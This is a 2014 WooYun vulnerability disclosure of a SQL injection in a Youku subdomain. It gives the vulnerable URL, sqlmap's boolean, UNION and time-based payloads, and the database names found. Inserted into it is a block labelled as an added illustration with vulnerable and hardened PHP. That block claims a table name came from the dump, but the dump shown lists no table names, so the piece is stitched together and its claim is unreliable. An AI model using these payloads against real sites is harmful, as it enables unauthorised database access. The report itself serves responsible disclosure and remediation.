SQL injection on a Youku sub-site

ID: 83661
URL: http://www.wooyun.org/bug.php?action=view&id=83661
Vulnerability status: confirmed by vendor
Title: SQL injection on a Youku sub-site
Vulnerability type: SQL injection
Vendor: Youku (优酷)
White hat: U神
Submitted: 2014-11-17 22:29:00
Published: 2015-01-01 22:30:00
Fix time: (not set)
Confirmed: 2014-11-18 00:00:00
Confirm Spend: 1
Tags: (none)
Followers: 0
Favorites: 0
White-hat rating:
White-hat self-assessment: rank 15
Vendor rating:
Vendor assessment: rank 10
Summary: None
Vulnerability details

http://hvsop.youku.com/list.php?music=1


[screenshot: 09.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: music
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: music=1' AND 7821=7821 AND 'IbzW'='IbzW
Type: UNION query
Title: MySQL UNION query (NULL) - 15 columns
Payload: music=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178686571,0x496c4e6172726d6c4b7a,0x7166706a71),NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: music=1' AND SLEEP(5) AND 'fKmP'='fKmP
---
[22:00:42] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[22:00:42] [INFO] fetching database names
available databases [3]:
[*] db_events
[*] information_schema
[*] test
[22:00:42] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\hvsop.youku.com'

POC

Database: db_events
[250 tables]

Remediation

I only went as far as dumping the table names and did not go any deeper. Please fix it, thanks~ I haven't had any rank for several days, could I get some?
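The report does not show the vulnerable code, so the following is an added illustration, not Youku's own source: a plausible shape of list.php that would produce exactly the boolean, UNION and time-based findings above, next to a hardened version using PDO prepared statements. It is written without PHP 7 syntax because the scan reports PHP 5.3.10; the table name hvsop_videos is taken from the dump, while the column name music, the DSN and the credentials are assumptions.

```php
<?php
// Added illustration, not the site's real code. hvsop_videos appears in the
// report's table dump; the column "music", the DSN and the account are assumed.

// VULNERABLE: the GET value is spliced into the SQL string. A value such as
// 1' AND SLEEP(5) AND 'a'='a closes the quote and becomes part of the WHERE
// clause, which is what the boolean, UNION and time-based detections rely on.
function listVideosVulnerable(PDO $db, $music)
{
    $sql = "SELECT id, title FROM hvsop_videos WHERE music = '" . $music . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: reject anything that is not a plain integer (music=1 is a numeric
// flag on the page), then bind the value to a server-side prepared statement
// so the data can never change the structure of the query.
function listVideosSafe(PDO $db, $music)
{
    if (!is_string($music) || !ctype_digit($music)) {
        header('HTTP/1.1 400 Bad Request');   // works on PHP 5.3 (no http_response_code yet)
        return array();
    }
    $stmt = $db->prepare('SELECT id, title FROM hvsop_videos WHERE music = :music');
    $stmt->bindValue(':music', (int) $music, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The account should be limited to db_events: the scan could list three
// databases, which means the app user had more visibility than it needed.
$db = new PDO('mysql:host=localhost;dbname=db_events;charset=utf8', 'app_user', 'CHANGE_ME', array(
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real prepared statements, not client-side quoting
));
$music = isset($_GET['music']) ? $_GET['music'] : '';
header('Content-Type: application/json');
echo json_encode(listVideosSafe($db, $music));
```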

Status history
2014-11-17: Details sent to the vendor, awaiting vendor handling
2014-11-18: Vendor confirmed; details disclosed to the vendor only
2014-11-28: Details disclosed to core white hats and relevant domain experts
2014-12-08: Details disclosed to regular white hats
2014-12-18: Details disclosed to intern white hats
2015-01-01: Details disclosed to the public
Vendor reply: Thanks for the heads-up, fixing right away.
Response: Severity: Medium; Vulnerability Rank: 10; Confirmed: 2014-11-18 08:46
Comments (columns: comment | commenter | likes | time)


Aepl│恋爱 | 0 likes | 2014-11-19 09:56:00

This account has been social-engineered, by: U神

backtrack丶yao | 0 likes | 2014-11-18 08:52:00

Front row~~~

ki11y0u | 0 likes | 2014-11-18 02:05:00